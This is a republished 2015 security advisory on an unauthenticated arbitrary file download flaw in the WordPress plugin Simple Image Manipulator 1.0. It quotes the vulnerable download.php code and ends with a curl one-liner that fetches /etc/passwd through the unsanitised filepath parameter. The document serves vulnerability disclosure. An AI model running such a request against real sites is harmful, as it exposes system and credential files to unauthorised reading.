Home / os / winmobile

WordPress Simple Image Manipulator 1.0 File Download

Posted on 09 August 2015

Title: Remote file download in simple-image-manipulator v1.0 wordpress plugin Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-16 Download Site: https://wordpress.org/plugins/simple-image-manipulator Vendor: https://profiles.wordpress.org/kevartpatel/ Vendor Notified: 2015-07-16 Vendor Contact: plugins@wordpress.org Description: Manipulate your wordpress images using slider and tickboxes. Vulnerability: In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location: 14 /* Figure out the MIME type | Check in array */ 15 $known_mime_types=array( 16 "pdf" => "application/pdf", 17 "txt" => "text/plain", 18 "html" => "text/html", 19 "htm" => "text/html", 20 "exe" => "application/octet-stream", 21 "zip" => "application/zip", 22 "doc" => "application/msword", 23 "xls" => "application/vnd.ms-excel", 24 "ppt" => "application/vnd.ms-powerpoint", 25 "gif" => "image/gif", 26 "png" => "image/png", 27 "jpeg"=> "image/jpg", 28 "jpg" => "image/jpg", 29 "php" => "text/plain" 30 ); 31 32 if($mime_type==''){ 33 $file_extension = strtolower(substr(strrchr($file,"."),1)); 34 if(array_key_exists($file_extension, $known_mime_types)){ 35 $mime_type=$known_mime_types[$file_extension]; 36 } else { 37 $mime_type="application/force-download"; 38 }; 39 }; CVEID: OSVDB: Exploit Code: • curl -sk "http://www.vapidlabs.com/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"

 

TOP